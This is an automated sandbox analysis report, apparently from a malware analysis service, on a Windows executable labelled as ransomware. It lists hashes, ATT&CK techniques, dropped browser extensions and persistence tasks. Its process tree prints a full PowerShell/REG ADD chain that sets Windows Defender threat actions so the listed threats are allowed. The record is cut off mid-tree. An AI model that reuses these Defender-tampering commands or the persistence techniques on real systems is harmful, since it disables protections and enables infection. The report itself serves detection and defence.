12405a7f8f62a12fbfb93668c5d1314c88440eb9e11e37933a31d98fa73a11f6

Analysis

max time kernel
133s
max time network
135s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2024, 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
Size

6.6MB
MD5

ec105a10fbc6340a69581f36454d722f
SHA1

744eaf350ae3aa2865bc5bce43b72f5c0e6ab5c7
SHA256

12405a7f8f62a12fbfb93668c5d1314c88440eb9e11e37933a31d98fa73a11f6
SHA512

d6c5833510e50390a90a35329a30bf80af3909f871a00731dc7bfdfaea803e28929440853d106ed157431cabf3e5d5feed5635f360e02e32113c9ec87d000d59
SSDEEP

196608:66ABZOhEyu0HDsqhU8gccZ6Limi6rHTZTBq+djV:cOhEyFoq0R6Limb1B5

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5004	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggjedgimacfdgfngpbbebgmhpkfnhmkd\1.0_0\manifest.json	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\wLIvplUSU\fOZxZnP.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\FfZnQZi.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\sGoSwYu.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\JJyFpTQoRlUn\GClOxgb.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{C04E7587-BB46-4214-87AE-35EEE298104A}.xpi	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\WJFamJaEBTfU2\bDObRRY.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\fnPDPsTirKjrC\eSnHGUg.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\fnPDPsTirKjrC\wBIhviU.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\wLIvplUSU\vWqHAt.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{C04E7587-BB46-4214-87AE-35EEE298104A}.xpi	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\WJFamJaEBTfU2\evDWIqIHwABtr.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\thOwFuKJdpsLdjY.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2368	2308	WerFault.exe	82

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2828	schtasks.exe
2920	schtasks.exe
2256	schtasks.exe
3888	schtasks.exe
2824	schtasks.exe
2120	schtasks.exe
2164	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
1068	powershell.exe
1068	powershell.exe
5048	powershell.exe
5048	powershell.exe
5004	powershell.EXE
5004	powershell.EXE
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	5004	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2308 wrote to memory of 1068	2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	86
PID 2308 wrote to memory of 1068	2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	86
PID 2308 wrote to memory of 1068	2308	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	86
PID 1068 wrote to memory of 3864	1068	powershell.exe	88
PID 1068 wrote to memory of 3864	1068	powershell.exe	88
PID 1068 wrote to memory of 3864	1068	powershell.exe	88
PID 3864 wrote to memory of 2888	3864	cmd.exe	89
PID 3864 wrote to memory of 2888	3864	cmd.exe	89
PID 3864 wrote to memory of 2888	3864	cmd.exe	89
PID 1068 wrote to memory of 4252	1068	powershell.exe	90
PID 1068 wrote to memory of 4252	1068	powershell.exe	90
PID 1068 wrote to memory of 4252	1068	powershell.exe	90
PID 1068 wrote to memory of 5068	1068	powershell.exe	91
PID 1068 wrote to memory of 5068	1068	powershell.exe	91
PID 1068 wrote to memory of 5068	1068	powershell.exe	91
PID 1068 wrote to memory of 2004	1068	powershell.exe	92
PID 1068 wrote to memory of 2004	1068	powershell.exe	92
PID 1068 wrote to memory of 2004	1068	powershell.exe	92
PID 1068 wrote to memory of 2920	1068	powershell.exe	93
PID 1068 wrote to memory of 2920	1068	powershell.exe	93
PID 1068 wrote to memory of 2920	1068	powershell.exe	93
PID 1068 wrote to memory of 2044	1068	powershell.exe	94
PID 1068 wrote to memory of 2044	1068	powershell.exe	94
PID 1068 wrote to memory of 2044	1068	powershell.exe	94
PID 1068 wrote to memory of 4264	1068	powershell.exe	95
PID 1068 wrote to memory of 4264	1068	powershell.exe	95
PID 1068 wrote to memory of 4264	1068	powershell.exe	95
PID 1068 wrote to memory of 5016	1068	powershell.exe	96
PID 1068 wrote to memory of 5016	1068	powershell.exe	96
PID 1068 wrote to memory of 5016	1068	powershell.exe	96
PID 1068 wrote to memory of 4480	1068	powershell.exe	97
PID 1068 wrote to memory of 4480	1068	powershell.exe	97
PID 1068 wrote to memory of 4480	1068	powershell.exe	97
PID 1068 wrote to memory of 2580	1068	powershell.exe	98
PID 1068 wrote to memory of 2580	1068	powershell.exe	98
PID 1068 wrote to memory of 2580	1068	powershell.exe	98
PID 1068 wrote to memory of 4712	1068	powershell.exe	99
PID 1068 wrote to memory of 4712	1068	powershell.exe	99
PID 1068 wrote to memory of 4712	1068	powershell.exe	99
PID 1068 wrote to memory of 3088	1068	powershell.exe	100
PID 1068 wrote to memory of 3088	1068	powershell.exe	100
PID 1068 wrote to memory of 3088	1068	powershell.exe	100
PID 1068 wrote to memory of 2324	1068	powershell.exe	101
PID 1068 wrote to memory of 2324	1068	powershell.exe	101
PID 1068 wrote to memory of 2324	1068	powershell.exe	101
PID 1068 wrote to memory of 3544	1068	powershell.exe	102
PID 1068 wrote to memory of 3544	1068	powershell.exe	102
PID 1068 wrote to memory of 3544	1068	powershell.exe	102
PID 1068 wrote to memory of 2180	1068	powershell.exe	103
PID 1068 wrote to memory of 2180	1068	powershell.exe	103
PID 1068 wrote to memory of 2180	1068	powershell.exe	103
PID 1068 wrote to memory of 4568	1068	powershell.exe	104
PID 1068 wrote to memory of 4568	1068	powershell.exe	104
PID 1068 wrote to memory of 4568	1068	powershell.exe	104
PID 1068 wrote to memory of 2976	1068	powershell.exe	105
PID 1068 wrote to memory of 2976	1068	powershell.exe	105
PID 1068 wrote to memory of 2976	1068	powershell.exe	105
PID 1068 wrote to memory of 2596	1068	powershell.exe	106
PID 1068 wrote to memory of 2596	1068	powershell.exe	106
PID 1068 wrote to memory of 2596	1068	powershell.exe	106
PID 1068 wrote to memory of 1964	1068	powershell.exe	107
PID 1068 wrote to memory of 1964	1068	powershell.exe	107
PID 1068 wrote to memory of 1964	1068	powershell.exe	107
PID 1068 wrote to memory of 2088	1068	powershell.exe	108

C:\Users\Admin\AppData\Local\Temp\2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3864
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:2888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\reg.exe
